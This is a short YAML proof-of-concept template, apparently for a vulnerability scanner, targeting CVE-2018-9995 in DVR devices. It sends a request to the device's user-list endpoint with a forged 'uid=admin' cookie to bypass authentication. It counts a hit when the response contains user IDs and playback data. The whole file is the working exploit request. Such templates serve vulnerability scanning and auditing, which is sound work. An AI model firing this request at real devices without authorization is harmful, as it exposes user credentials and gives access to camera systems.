name: poc-yaml-dvr-cve-2018-9995
rules:
  - method: GET
    path: >-
      /device.rsp?opt=user&cmd=list
    headers:
      Cookie: uid=admin
    follow_redirects: true
    expression: >
      response.status == 200 && response.body.bcontains(bytes("\"uid\":")) && response.body.bcontains(b"playback")
detail:
  author: cc_ci(https://github.com/cc8ci)
  Affected Version: "DVR"
  links:
    - https://s.tencent.com/research/bsafe/474.html